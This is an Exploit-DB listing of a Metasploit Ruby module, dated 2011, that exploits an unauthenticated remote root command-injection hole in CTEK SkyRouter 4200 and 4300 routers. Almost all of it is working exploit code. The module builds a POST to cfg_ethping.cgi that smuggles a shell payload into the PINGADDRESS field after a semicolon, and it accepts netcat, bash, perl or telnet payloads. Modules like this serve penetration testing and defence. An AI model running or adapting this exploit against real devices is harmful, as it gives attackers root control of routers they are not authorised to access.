CTEK SkyRouter 4200/4300 – Command Execution (Metasploit)

  • 作者: Metasploit
    日期: 2011-11-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18172/
  • ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'CTEK SkyRouter 4200 and 4300 Command Execution',
			'Description'=> %q{
					This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
			},
			'Author' => [ 'savant42' ],#with module help from kos
			'License'=> MSF_LICENSE,
			'References' => [ 'URL', 'http://dev.metasploit.com/redmine/issues/5610'],
			'Privileged' => false,
			'Payload'=>
				{
					'DisableNops' => true,
					'Space' => 1024,
					'Compat'=>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet netcat-e bash',
						}
				},
			'Platform' => 'unix',
			'Arch' => ARCH_CMD,
			'Targets'=> [[ 'Automatic', { }]],
			'DisclosureDate' => 'Sep 8 2011', # CGI historical date :)
			'DefaultTarget' => 0))

	end

	def exploit
		post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26"
		uri= '/apps/a3/cfg_ethping.cgi'
		print_status("Sending HTTP request for #{uri}")
		res = send_request_cgi( {
			'global' => true,
			'uri'=> uri,
			'method' => "POST",
			'data' => post_data
		}, 30)

		if res
			print_status("The server responded with HTTP CODE #{res.code}")
		else
			print_status("The server did not respond to our request")
		end

		handler
	end

end